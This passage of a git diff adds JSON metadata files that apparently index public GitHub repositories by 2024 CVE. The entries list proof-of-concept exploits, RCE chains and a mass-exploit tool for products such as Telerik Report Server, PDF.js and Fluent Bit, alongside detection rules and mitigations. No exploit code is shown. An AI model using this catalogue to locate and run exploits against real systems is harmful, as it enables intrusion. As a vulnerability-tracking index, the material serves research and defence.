"This repository provides a workaround preventing exploitation of SECURITY-3430 \/ CVE-2024-43044", + "fork": false, + "created_at": "2024-08-08T11:55:32Z", + "updated_at": "2024-09-23T00:29:13Z", + "pushed_at": "2024-08-12T17:19:25Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 841861299, + "name": "CVE-2024-43044-POC", + "full_name": "v9d0g\/CVE-2024-43044-POC", + "owner": { + "login": "v9d0g", + "id": 139420834, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/139420834?v=4", + "html_url": "https:\/\/github.com\/v9d0g", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/v9d0g\/CVE-2024-43044-POC", + "description": "CVE-2024-43044的利用方式", + "fork": false, + "created_at": "2024-08-13T07:32:35Z", + "updated_at": "2024-12-29T18:49:35Z", + "pushed_at": "2024-08-13T07:43:22Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 17, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 846725221, + "name": "CVE-2024-43044-jenkins", + "full_name": "convisolabs\/CVE-2024-43044-jenkins", + "owner": { + "login": "convisolabs", + "id": 92468795, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92468795?v=4", + "html_url": "https:\/\/github.com\/convisolabs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/convisolabs\/CVE-2024-43044-jenkins", + "description": "Exploit for the vulnerability CVE-2024-43044 in Jenkins", + "fork": false, + "created_at": "2024-08-23T20:26:26Z", + "updated_at": "2024-11-28T05:26:21Z", + "pushed_at": "2024-10-02T21:58:12Z", + "stargazers_count": 167, + "watchers_count": 167, + "has_discussions": false, + "forks_count": 22, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 22, + "watchers": 167, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-43160.json b/2024/CVE-2024-43160.json new file mode 100644 index 0000000000..b719d86d60 --- /dev/null +++ b/2024/CVE-2024-43160.json @@ -0,0 +1,33 @@ +[ + { + "id": 858533589, + "name": "CVE-2024-43160", + "full_name": "KTN1990\/CVE-2024-43160", + "owner": { + "login": "KTN1990", + "id": 33407405, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33407405?v=4", + "html_url": "https:\/\/github.com\/KTN1990", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KTN1990\/CVE-2024-43160", + "description": "The BerqWP – Automated All-In-One PageSpeed Optimization Plugin for Core Web Vitals, Cache, CDN, Images, CSS, and JavaScript plugin for WordPress is vulnerable to arbitrary file uploads", + "fork": false, + "created_at": "2024-09-17T04:19:54Z", + "updated_at": "2024-12-10T02:51:46Z", + "pushed_at": "2024-09-17T04:30:16Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-4320.json b/2024/CVE-2024-4320.json new file mode 100644 index 0000000000..0f720913ff --- /dev/null +++ b/2024/CVE-2024-4320.json @@ -0,0 +1,33 @@ +[ + { + "id": 839650605, + "name": "CVE-2024-4320", + "full_name": "bolkv\/CVE-2024-4320", + "owner": { + "login": "bolkv", + "id": 145219983, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145219983?v=4", + "html_url": "https:\/\/github.com\/bolkv", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bolkv\/CVE-2024-4320", + "description": null, + "fork": false, + "created_at": "2024-08-08T03:54:38Z", + "updated_at": "2024-08-08T03:54:46Z", + "pushed_at": "2024-08-08T03:54:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-4323.json b/2024/CVE-2024-4323.json new file mode 100644 index 0000000000..dda443ce80 --- /dev/null +++ b/2024/CVE-2024-4323.json @@ -0,0 +1,102 @@ +[ + { + "id": 803353937, + "name": "CVE-2024-4323-Exploit-POC", + "full_name": "skilfoy\/CVE-2024-4323-Exploit-POC", + "owner": { + "login": "skilfoy", + "id": 20802814, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20802814?v=4", + "html_url": "https:\/\/github.com\/skilfoy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/skilfoy\/CVE-2024-4323-Exploit-POC", + "description": "This proof-of-concept script demonstrates how to exploit CVE-2024-4323, a memory corruption vulnerability in Fluent Bit, enabling remote code execution.", + "fork": false, + "created_at": "2024-05-20T15:04:13Z", + "updated_at": "2024-10-31T09:51:11Z", + "pushed_at": "2024-05-20T15:28:07Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-4323", + "cve-2024-4323-exploit-poc", + "exploit", + "exploit-poc", + "fluent-bit", + "rce-exploit" + ], + "visibility": "public", + "forks": 3, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 803825364, + "name": "CVE-2024-4323", + "full_name": "d0rb\/CVE-2024-4323", + "owner": { + "login": "d0rb", + "id": 10403781, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10403781?v=4", + "html_url": "https:\/\/github.com\/d0rb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/d0rb\/CVE-2024-4323", + "description": "Critical heap buffer overflow vulnerability in the handle_trace_request and parse_trace_request functions of the Fluent Bit HTTP server.", + "fork": false, + "created_at": "2024-05-21T12:59:16Z", + "updated_at": "2024-09-18T15:30:15Z", + "pushed_at": "2024-05-21T13:15:37Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 804283459, + "name": "CVE-2024-4323-dos_poc", + "full_name": "yuansec\/CVE-2024-4323-dos_poc", + "owner": { + "login": "yuansec", + "id": 18318654, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18318654?v=4", + "html_url": "https:\/\/github.com\/yuansec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yuansec\/CVE-2024-4323-dos_poc", + "description": null, + "fork": false, + "created_at": "2024-05-22T09:55:30Z", + "updated_at": "2024-05-22T10:13:52Z", + "pushed_at": "2024-05-22T10:13:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-43363.json b/2024/CVE-2024-43363.json new file mode 100644 index 0000000000..8861affbf8 --- /dev/null +++ b/2024/CVE-2024-43363.json @@ -0,0 +1,33 @@ +[ + { + "id": 869211393, + "name": "CVE-2024-43363", + "full_name": "p33d\/CVE-2024-43363", + "owner": { + "login": "p33d", + "id": 123099747, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/123099747?v=4", + "html_url": "https:\/\/github.com\/p33d", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/p33d\/CVE-2024-43363", + "description": null, + "fork": false, + "created_at": "2024-10-07T22:59:09Z", + "updated_at": "2025-01-07T12:51:28Z", + "pushed_at": "2024-10-07T22:59:53Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-43416.json b/2024/CVE-2024-43416.json new file mode 100644 index 0000000000..dc85e7557d --- /dev/null +++ b/2024/CVE-2024-43416.json @@ -0,0 +1,33 @@ +[ + { + "id": 890570505, + "name": "CVE-2024-43416-PoC", + "full_name": "0xmupa\/CVE-2024-43416-PoC", + "owner": { + "login": "0xmupa", + "id": 61334200, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61334200?v=4", + "html_url": "https:\/\/github.com\/0xmupa", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xmupa\/CVE-2024-43416-PoC", + "description": null, + "fork": false, + "created_at": "2024-11-18T19:58:42Z", + "updated_at": "2024-11-18T19:59:37Z", + "pushed_at": "2024-11-18T19:59:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-43425.json b/2024/CVE-2024-43425.json new file mode 100644 index 0000000000..a95ed49f37 --- /dev/null +++ b/2024/CVE-2024-43425.json @@ -0,0 +1,33 @@ +[ + { + "id": 846465649, + "name": "moodle-rce-calculatedquestions", + "full_name": "RedTeamPentesting\/moodle-rce-calculatedquestions", + "owner": { + "login": "RedTeamPentesting", + "id": 34096076, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34096076?v=4", + "html_url": "https:\/\/github.com\/RedTeamPentesting", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RedTeamPentesting\/moodle-rce-calculatedquestions", + "description": "Scripts for Analysis of a RCE in Moodle Calculated Questions (CVE-2024-43425)", + "fork": false, + "created_at": "2024-08-23T09:13:03Z", + "updated_at": "2024-12-04T09:24:45Z", + "pushed_at": "2024-08-23T09:36:55Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 17, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-4351.json b/2024/CVE-2024-4351.json new file mode 100644 index 0000000000..a8e5c07ed6 --- /dev/null +++ b/2024/CVE-2024-4351.json @@ -0,0 +1,33 @@ +[ + { + "id": 890044743, + "name": "CVE-2024-4351", + "full_name": "ZSECURE\/CVE-2024-4351", + "owner": { + "login": "ZSECURE", + "id": 46941177, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46941177?v=4", + "html_url": "https:\/\/github.com\/ZSECURE", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ZSECURE\/CVE-2024-4351", + "description": null, + "fork": false, + "created_at": "2024-11-17T21:37:55Z", + "updated_at": "2024-11-17T21:39:06Z", + "pushed_at": "2024-11-17T21:39:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-4352.json b/2024/CVE-2024-4352.json new file mode 100644 index 0000000000..ced5d9072f --- /dev/null +++ b/2024/CVE-2024-4352.json @@ -0,0 +1,33 @@ +[ + { + "id": 801605479, + "name": "CVE-2024-4352-Poc", + "full_name": "truonghuuphuc\/CVE-2024-4352-Poc", + "owner": { + "login": "truonghuuphuc", + "id": 20487674, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20487674?v=4", + "html_url": "https:\/\/github.com\/truonghuuphuc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/truonghuuphuc\/CVE-2024-4352-Poc", + "description": "CVE-2024-4352 Tutor LMS Pro <= 2.7.0 - Missing Authorization to SQL Injection", + "fork": false, + "created_at": "2024-05-16T14:55:43Z", + "updated_at": "2024-06-26T12:03:39Z", + "pushed_at": "2024-05-17T08:03:00Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-43532.json b/2024/CVE-2024-43532.json new file mode 100644 index 0000000000..20f97091e3 --- /dev/null +++ b/2024/CVE-2024-43532.json @@ -0,0 +1,33 @@ +[ + { + "id": 889024932, + "name": "CVE-2024-43532", + "full_name": "expl0itsecurity\/CVE-2024-43532", + "owner": { + "login": "expl0itsecurity", + "id": 185355311, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/185355311?v=4", + "html_url": "https:\/\/github.com\/expl0itsecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/expl0itsecurity\/CVE-2024-43532", + "description": null, + "fork": false, + "created_at": "2024-11-15T13:15:39Z", + "updated_at": "2024-12-14T20:30:28Z", + "pushed_at": "2024-11-15T13:19:13Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-4358.json b/2024/CVE-2024-4358.json new file mode 100644 index 0000000000..a03ceb06b4 --- /dev/null +++ b/2024/CVE-2024-4358.json @@ -0,0 +1,193 @@ +[ + { + "id": 809672691, + "name": "CVE-2024-4358", + "full_name": "sinsinology\/CVE-2024-4358", + "owner": { + "login": "sinsinology", + "id": 77316200, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77316200?v=4", + "html_url": "https:\/\/github.com\/sinsinology", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sinsinology\/CVE-2024-4358", + "description": "Progress Telerik Report Server pre-authenticated RCE chain (CVE-2024-4358\/CVE-2024-1800)", + "fork": false, + "created_at": "2024-06-03T08:22:10Z", + "updated_at": "2024-12-05T18:13:45Z", + "pushed_at": "2024-06-06T16:18:08Z", + "stargazers_count": 74, + "watchers_count": 74, + "has_discussions": false, + "forks_count": 16, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 16, + "watchers": 74, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 810273513, + "name": "CVE-2024-4358", + "full_name": "RevoltSecurities\/CVE-2024-4358", + "owner": { + "login": "RevoltSecurities", + "id": 119435129, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/119435129?v=4", + "html_url": "https:\/\/github.com\/RevoltSecurities", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RevoltSecurities\/CVE-2024-4358", + "description": "An Vulnerability detection and Exploitation tool for CVE-2024-4358", + "fork": false, + "created_at": "2024-06-04T11:32:59Z", + "updated_at": "2024-11-05T01:52:36Z", + "pushed_at": "2024-06-04T11:41:27Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 810399215, + "name": "CVE-2024-4358", + "full_name": "Harydhk7\/CVE-2024-4358", + "owner": { + "login": "Harydhk7", + "id": 148646710, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148646710?v=4", + "html_url": "https:\/\/github.com\/Harydhk7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Harydhk7\/CVE-2024-4358", + "description": null, + "fork": false, + "created_at": "2024-06-04T16:07:36Z", + "updated_at": "2024-06-04T16:23:17Z", + "pushed_at": "2024-06-04T16:23:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 810576909, + "name": "CVE-2024-4358_Mass_Exploit", + "full_name": "Sk1dr0wz\/CVE-2024-4358_Mass_Exploit", + "owner": { + "login": "Sk1dr0wz", + "id": 108571358, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108571358?v=4", + "html_url": "https:\/\/github.com\/Sk1dr0wz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Sk1dr0wz\/CVE-2024-4358_Mass_Exploit", + "description": null, + "fork": false, + "created_at": "2024-06-05T01:05:12Z", + "updated_at": "2024-09-26T10:33:44Z", + "pushed_at": "2024-06-05T11:28:40Z", + "stargazers_count": 23, + "watchers_count": 23, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 23, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 812526267, + "name": "CVE-2024-4358", + "full_name": "verylazytech\/CVE-2024-4358", + "owner": { + "login": "verylazytech", + "id": 172168670, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/172168670?v=4", + "html_url": "https:\/\/github.com\/verylazytech", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/verylazytech\/CVE-2024-4358", + "description": "Authentication Bypass Vulnerability — CVE-2024–4358 — Telerik Report Server 2024", + "fork": false, + "created_at": "2024-06-09T06:30:06Z", + "updated_at": "2024-12-30T21:06:51Z", + "pushed_at": "2024-11-26T14:46:07Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "authentication-bypass", + "cve-2024-4358", + "poc-cve-2024-4358", + "telerik-report-server" + ], + "visibility": "public", + "forks": 4, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 846915417, + "name": "CVE-2024-4358", + "full_name": "gh-ost00\/CVE-2024-4358", + "owner": { + "login": "gh-ost00", + "id": 153366162, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/153366162?v=4", + "html_url": "https:\/\/github.com\/gh-ost00", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gh-ost00\/CVE-2024-4358", + "description": "Telerik Report Server deserialization and authentication bypass exploit chain for CVE-2024-4358\/CVE-2024-1800", + "fork": false, + "created_at": "2024-08-24T10:09:09Z", + "updated_at": "2024-10-15T07:21:11Z", + "pushed_at": "2024-08-24T10:48:43Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-436.json b/2024/CVE-2024-436.json new file mode 100644 index 0000000000..9e18b318a7 --- /dev/null +++ b/2024/CVE-2024-436.json @@ -0,0 +1,33 @@ +[ + { + "id": 913326482, + "name": "CVE-2024-436_Exploit", + "full_name": "Julian-gmz\/CVE-2024-436_Exploit", + "owner": { + "login": "Julian-gmz", + "id": 77108278, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77108278?v=4", + "html_url": "https:\/\/github.com\/Julian-gmz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Julian-gmz\/CVE-2024-436_Exploit", + "description": null, + "fork": false, + "created_at": "2025-01-07T13:21:50Z", + "updated_at": "2025-01-07T13:21:50Z", + "pushed_at": "2025-01-07T13:21:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-4367.json b/2024/CVE-2024-4367.json new file mode 100644 index 0000000000..bb1a6df409 --- /dev/null +++ b/2024/CVE-2024-4367.json @@ -0,0 +1,363 @@ +[ + { + "id": 803221600, + "name": "CVE-2024-4367-PoC", + "full_name": "LOURC0D3\/CVE-2024-4367-PoC", + "owner": { + "login": "LOURC0D3", + "id": 83567597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83567597?v=4", + "html_url": "https:\/\/github.com\/LOURC0D3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LOURC0D3\/CVE-2024-4367-PoC", + "description": "CVE-2024-4367 & CVE-2024-34342 Proof of Concept", + "fork": false, + "created_at": "2024-05-20T10:02:23Z", + "updated_at": "2025-01-05T03:56:02Z", + "pushed_at": "2024-06-07T03:28:00Z", + "stargazers_count": 143, + "watchers_count": 143, + "has_discussions": false, + "forks_count": 20, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 20, + "watchers": 143, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 803533618, + "name": "CVE-2024-4367-POC", + "full_name": "s4vvysec\/CVE-2024-4367-POC", + "owner": { + "login": "s4vvysec", + "id": 153960960, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/153960960?v=4", + "html_url": "https:\/\/github.com\/s4vvysec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/s4vvysec\/CVE-2024-4367-POC", + "description": "CVE-2024-4367 arbitrary js execution in pdf js", + "fork": false, + "created_at": "2024-05-20T22:56:10Z", + "updated_at": "2024-12-10T07:46:23Z", + "pushed_at": "2024-05-20T23:09:43Z", + "stargazers_count": 45, + "watchers_count": 45, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 45, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 804506786, + "name": "detect-cve-2024-4367", + "full_name": "spaceraccoon\/detect-cve-2024-4367", + "owner": { + "login": "spaceraccoon", + "id": 18413849, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18413849?v=4", + "html_url": "https:\/\/github.com\/spaceraccoon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/spaceraccoon\/detect-cve-2024-4367", + "description": "YARA detection rule for CVE-2024-4367 arbitrary javascript execution in PDF.js", + "fork": false, + "created_at": "2024-05-22T18:05:47Z", + "updated_at": "2024-12-17T03:44:10Z", + "pushed_at": "2024-05-27T03:06:09Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 804608693, + "name": "pdfjs-vuln-demo", + "full_name": "clarkio\/pdfjs-vuln-demo", + "owner": { + "login": "clarkio", + "id": 6265396, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6265396?v=4", + "html_url": "https:\/\/github.com\/clarkio", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/clarkio\/pdfjs-vuln-demo", + "description": "This project is intended to serve as a proof of concept to demonstrate exploiting the vulnerability in the PDF.js (pdfjs-dist) library reported in CVE-2024-4367", + "fork": false, + "created_at": "2024-05-22T23:18:20Z", + "updated_at": "2024-08-17T19:52:12Z", + "pushed_at": "2024-11-10T04:17:31Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "application-security", + "appsec", + "astro", + "astrojs", + "pdf", + "pdfjs", + "pdfjs-dist", + "react", + "security", + "svelte", + "vue", + "vuejs", + "web" + ], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 804747982, + "name": "pdfjs_disable_eval", + "full_name": "avalahEE\/pdfjs_disable_eval", + "owner": { + "login": "avalahEE", + "id": 56412727, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56412727?v=4", + "html_url": "https:\/\/github.com\/avalahEE", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/avalahEE\/pdfjs_disable_eval", + "description": "CVE-2024-4367 mitigation for Odoo 14.0", + "fork": false, + "created_at": "2024-05-23T07:34:15Z", + "updated_at": "2024-05-27T08:25:46Z", + "pushed_at": "2024-05-27T07:23:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "odoo14" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 814724272, + "name": "cve-2024-4367-PoC-fixed", + "full_name": "Zombie-Kaiser\/cve-2024-4367-PoC-fixed", + "owner": { + "login": "Zombie-Kaiser", + "id": 141570642, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/141570642?v=4", + "html_url": "https:\/\/github.com\/Zombie-Kaiser", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Zombie-Kaiser\/cve-2024-4367-PoC-fixed", + "description": "PDF.js是由Mozilla维护的基于JavaScript的PDF查看器。此漏洞允许攻击者在打开恶意 PDF 文件后立即执行任意 JavaScript 代码。这会影响所有 Firefox 用户 (<126),因为 Firefox 使用 PDF.js 来显示 PDF 文件,但也严重影响了许多基于 Web 和 Electron 的应用程序,这些应用程序(间接)使用 PDF.js 进行预览功能。", + "fork": false, + "created_at": "2024-06-13T15:14:47Z", + "updated_at": "2024-12-01T16:03:04Z", + "pushed_at": "2024-06-13T15:19:57Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 816264581, + "name": "pdfjs-vuln-demo", + "full_name": "snyk-labs\/pdfjs-vuln-demo", + "owner": { + "login": "snyk-labs", + "id": 47793611, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47793611?v=4", + "html_url": "https:\/\/github.com\/snyk-labs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/snyk-labs\/pdfjs-vuln-demo", + "description": "This project is intended to serve as a proof of concept to demonstrate exploiting the vulnerability in the PDF.js (pdfjs-dist) library reported in CVE-2024-4367", + "fork": false, + "created_at": "2024-06-17T11:39:41Z", + "updated_at": "2024-12-15T22:43:59Z", + "pushed_at": "2024-06-20T13:40:31Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 8, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 817529952, + "name": "PDFernetRemotelo", + "full_name": "UnHackerEnCapital\/PDFernetRemotelo", + "owner": { + "login": "UnHackerEnCapital", + "id": 173314584, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/173314584?v=4", + "html_url": "https:\/\/github.com\/UnHackerEnCapital", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/UnHackerEnCapital\/PDFernetRemotelo", + "description": "PoC - Prueba de Concepto de CVE-2024-4367 en conjunto al CVE-2023-38831 en un solo Script", + "fork": false, + "created_at": "2024-06-19T23:23:07Z", + "updated_at": "2024-11-20T16:30:50Z", + "pushed_at": "2024-06-20T00:02:49Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 852283076, + "name": "CVE-2024-4367-Analysis", + "full_name": "Masamuneee\/CVE-2024-4367-Analysis", + "owner": { + "login": "Masamuneee", + "id": 125840508, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/125840508?v=4", + "html_url": "https:\/\/github.com\/Masamuneee", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Masamuneee\/CVE-2024-4367-Analysis", + "description": null, + "fork": false, + "created_at": "2024-09-04T14:43:33Z", + "updated_at": "2024-12-19T08:12:18Z", + "pushed_at": "2024-09-04T15:17:57Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 884449297, + "name": "CVE-2024-4367-pdf-sample", + "full_name": "pedrochalegre7\/CVE-2024-4367-pdf-sample", + "owner": { + "login": "pedrochalegre7", + "id": 101287325, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101287325?v=4", + "html_url": "https:\/\/github.com\/pedrochalegre7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pedrochalegre7\/CVE-2024-4367-pdf-sample", + "description": null, + "fork": false, + "created_at": 